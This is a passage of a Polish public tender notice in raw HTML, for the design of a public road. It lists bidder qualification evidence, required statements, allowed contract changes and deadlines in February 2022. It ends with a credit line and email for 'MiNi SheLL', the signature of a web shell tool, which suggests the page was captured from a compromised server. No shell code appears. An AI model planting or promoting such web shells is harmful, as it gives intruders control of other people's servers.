ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie):<br/>- minimum jedną usługę polegającą na wykonaniu projektu budowy lub rozbudowy lub<br/>przebudowy drogi publicznej <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W postępowaniu o udzielenie zamówienia zamawiający może żądać podmiotowych środków dowodowych na potwierdzenie:<br/>1) Braku podstaw wykluczenia<br/>W celu potwierdzenia spełniania warunku - oświadczenie o braku podstaw do wykluczenia – zał. nr 1a<br/>do Rozdział I SWZ. Informacje zawarte w oświadczeniu będą stanowić potwierdzenie, że wykonawca<br/>nie podlega wykluczeniu.<br/>2) Spełniania warunków udziału w postępowaniu lub kryteriów selekcji.<br/>W celu potwierdzenia spełniania warunku - oświadczenie o spełnianiu warunków udziału w<br/>postępowaniu – zał. nr 1b do Rozdział I SWZ. Informacje zawarte w oświadczeniu będą stanowić<br/>wstępne potwierdzenie, że wykonawca spełnia warunki udziału w postępowaniu.<br/>3) Warunek zdolności do występowania w obrocie gospodarczym – wpis do odpowiedniego rejestru.<br/>Zamawiający nie precyzuje warunków w przedmiotowym zakresie.<br/>4) Warunek posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej – zezwolenia, licencje, koncesje lub wpis do rejestru.<br/>Zamawiający nie precyzuje warunków w przedmiotowy zakresie.<br/>5) Warunki dotyczące określonej sytuacji finansowej lub ekonomicznej.<br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu<br/>lub kryteriów selekcji dotyczących sytuacji ekonomicznej lub finansowej zamawiający może żądać, w<br/>szczególności, następujących podmiotowych środków dowodowych:<br/>Dokumentów potwierdzających, że wykonawca jest ubezpieczony<br/>od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej<br/>z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.<br/>Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego<br/>podmiotowych środków dowodowych, o których mowa w lit. a, wykonawca składa inne podmiotowe<br/>środki dowodowe, które wystarczający sposób potwierdzają spełnienie opisanego przez<br/>zamawiającego warunku udziału w postępowaniu lub kryteriów selekcji dotyczącego sytuacji<br/>ekonomicznej lub finansowej.<br/>6) Warunki dotyczące niezbędnego wykształcenia, kwalifikacji zawodowych, doświadczenia, potencjału<br/>technicznego:<br/>a. Wykonawca spełnia ten warunek udziału w postępowaniu /dotyczący kwalifikacji zawodowych/,<br/>jeżeli wykaże, że dysponuje następującą osobą:<br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu lub kryteriów<br/>selekcji dotyczących zdolności technicznej lub zawodowej, zamawiający może, w zależności od<br/>charakteru, znaczenia, przeznaczenia lub zakresu robót budowlanych, dostaw lub usług, żądać<br/>następujących podmiotowych środków dowodowych: wykazu osób<br/>/wzór wykazu osób stanowi załącznik nr 1d -Rozdział I SWZ/<br/>Osoba ta musi posiadać minimum 3-letnie doświadczenie. Ilość lat doświadczenia należy liczyć od daty<br/>wystawienia uprawnień.<br/>a. Wykonawca spełni ten warunek udziału w postępowaniu /dotyczący doświadczenia/ jeżeli wykaże,<br/>że: wykonał w ciągu ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie):<br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu lub kryteriów<br/>selekcji dotyczących zdolności technicznej lub zawodowej, zamawiający może, w zależności od<br/>charakteru, znaczenia, przeznaczenia lub zakresu robót budowlanych, dostaw lub usług, żądać<br/>następujących podmiotowych środków dowodowych:<br/>Wykazu usług wykonywanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca<br/>wykonania oraz podmiotów, na rzecz których usługi te zostały wykonane, oraz załączeniem dowodów<br/>określających, czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty sporządzone przed podmiot, na rzecz którego usługi zostały<br/>wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych<br/>dokumentów – inne odpowiednie dokumenty.<br/>/wzór wykazu usług stanowi załącznik nr 1e -Rozdział I SWZ/</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie precyzuje warunków w przedmiotowy zakresie.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie precyzuje warunków w przedmiotowy zakresie. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć:<br/>1) Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>2) Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>3) Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania – wzór oświadczenia<br/>o niepodleganiu wykluczeniu stanowi Załącznik nr 1a Rozdział I SWZ.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie<br/>o niepodleganiu wykluczeniu składa każdy z Wykonawców;<br/>4) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu – wzór<br/>oświadczenia o niepodleganiu wykluczeniu stanowi Załącznik nr 1b Rozdział I SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wspólne ubieganie się Wykonawców o udzielenie zamówienia: Wykonawcy mogą wspólnie<br/>ubiegać się o udzielenie zamówienia:<br/>a) W przypadku, o którym mowa w pkt 7, wykonawcy ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>b)Zamawiający nie może wymagać od wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia posiadania określonej formy prawnej w celu złożenia oferty lub wniosku o<br/>dopuszczenie do udziału w postępowaniu.<br/>c) Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający przewiduje możliwość wprowadzenia zmian do umowy w stosunku do treści<br/>Oferty, na podstawie której dokonano wyboru wykonawcy, jeżeli wystąpią następujące<br/>przesłanki:<br/>1) Skrócenie albo wydłużenie terminu wykonania Umowy lub jej poszczególnych Elementów w<br/>przypadku zaistnienia następujących okoliczności:<br/>a) Siły wyższej, to znaczy niezależnego od Stron losowego zdarzenia zewnętrznego, które było<br/>niemożliwe do przewidzenia w momencie zawarcia Umowy i któremu nie można było zapobiec<br/>mimo dochowania należytej staranności,<br/>b) Wezwanie przez organy administracji publicznej lub inne upoważnione podmioty do<br/>uzupełnienia Przedmiotu Umowy lub jego poszczególnych Elementów, nie wynikające z winy<br/>Wykonawcy,<br/>c) Przekroczenie przewidzianych przepisami prawa terminów trwania procedur<br/>administracyjnych, liczonych zgodnie z zasadami określonymi w kodeksie postępowania<br/>administracyjnego nie wynikające z winy Wykonawcy,<br/>d) Nie wynikająca z zaniedbań Wykonawcy odmowa wydania przez organy administracji<br/>wymaganych decyzji, zezwoleń, uzgodnień,<br/>e) Żądanie przez organ administracji uzupełnienia dokumentacji, przez sporządzenie projektów<br/>rozgraniczenia gruntów, dostarczenia decyzji<br/>i postanowień innych organów, przeprowadzenia geodezyjnego rozgraniczenia gruntów,<br/>aktualizacji operatów ewidencji gruntów,<br/>f) Gdy po ustaleniu zakresu raportu oddziaływania przedsięwzięcia na środowisko niemożliwym<br/>jest wykonanie całości zamówienia w terminie przewidzianym prawem (jeżeli dotyczy),<br/>g) Szczególnie uzasadnionych trudności w pozyskiwaniu materiałów wyjściowych do<br/>poszczególnych Elementów Umowy,<br/>h) Zmiany przepisów prawa,<br/>i) Objęcia zasobów, tworów i składników przyrody jedną z form przewidzianych<br/>w ustawie o ochronie przyrody, zmiana ich granic lub przedmiotu ochrony,<br/>Pozostałe zmiany umowy określono w § 7 Zmiany umowy - Rozdział II Projektowane<br/>postanowienia umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">www.ekolbuszowa.logintrade.net</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-18 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-19</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com